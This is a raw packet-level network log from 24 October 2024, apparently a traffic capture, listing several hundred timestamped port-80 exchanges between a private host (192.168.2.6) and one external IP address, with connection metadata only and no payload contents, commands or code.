Oct 24, 2024 13:02:19.720140934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720145941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720180988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720211029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720213890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720247984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720277071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720280886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720314980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720344067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720347881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720381975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720411062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720416069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720449924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720480919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720484018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720519066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720546961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720555067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720937967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.720969915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.720973969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721009970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721040964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721045017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721075058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721077919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721113920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721121073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721141100 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721147060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721179008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721180916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721210957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721215963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721251011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721280098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721286058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721319914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721349955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721354008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721388102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721412897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721421003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721457005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721486092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721489906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721858978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721892118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721895933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721925974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721955061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.721961021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.721996069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722026110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722029924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722059011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722074032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722083092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722090006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722106934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722115993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722121954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722138882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722146988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722156048 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722166061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722172976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722188950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722197056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722203970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722214937 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722220898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722239017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722248077 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722259998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722282887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722451925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722464085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722475052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722486973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722500086 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722562075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722574949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722584963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722588062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722598076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722609043 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722609043 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722620964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.722621918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722635031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.722661018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.725132942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.760804892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.760843992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.760876894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.761135101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.800596952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800659895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800669909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800708055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800718069 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800750017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.800946951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.800976038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.801137924 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.801146984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.801211119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.801237106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.802987099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.833178997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833234072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833267927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833353996 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833420992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833424091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.833456993 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833487988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.833492041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.833719969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.057416916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.063899994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343589067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343635082 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343683958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.343699932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343738079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343767881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.343771935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343806982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343835115 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.343847990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343878984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.343883038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343913078 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.343916893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343955040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.343981028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344074965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344105005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344135046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344137907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344192028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344223976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344224930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344260931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344290018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344294071 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344327927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344357014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344360113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344393969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344422102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344425917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344460011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344484091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344495058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344715118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344746113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344748020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344782114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344810963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344813108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344850063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344876051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344883919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344918013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344945908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.344952106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.344990015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345020056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345040083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345072985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345103979 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345107079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345140934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345170975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345174074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345208883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345237017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345241070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345273972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345303059 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345309019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345686913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345717907 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345722914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345756054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345786095 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345789909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345849037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345877886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345880985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345915079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345944881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.345948935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.345984936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346010923 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346034050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346067905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346096039 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346102953 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346136093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346163988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346199036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346234083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346261978 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346266985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346311092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346339941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346479893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346544027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346577883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346605062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346611023 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346645117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346673012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346708059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346740961 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346767902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346772909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346807957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346837044 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346868038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346900940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346931934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.346935987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346970081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.346997976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347006083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347122908 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347209930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347244978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347275019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347279072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347309113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347333908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347361088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347376108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347404957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347434044 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347438097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347467899 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347472906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347503901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347507000 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347547054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347577095 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347579956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347618103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347646952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347729921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347759962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347764015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347799063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347826958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347834110 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347883940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347913027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347919941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347951889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.347980976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.347987890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348021984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348054886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348057985 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348088980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348118067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348121881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348154068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348181009 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348187923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348221064 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348248959 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348253965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348287106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348315001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348320961 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348352909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348381042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348388910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348512888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348872900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348905087 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.348936081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.348938942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.349020004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.349090099 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.349121094 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.349123001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.349155903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.349185944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.349195957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.350982904 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462450027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462476015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462495089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462543964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462559938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462575912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462574005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462591887 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462603092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462621927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462682962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462697983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462711096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462713003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462729931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462738037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462750912 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462765932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462829113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462855101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.462977886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.462995052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463006020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463010073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463072062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463072062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463145018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463161945 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463175058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463193893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463201046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463252068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463252068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:20.463306904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463339090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463354111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:20.463411093 CEST	49711	80	192.168.2.6	185.215.113.37
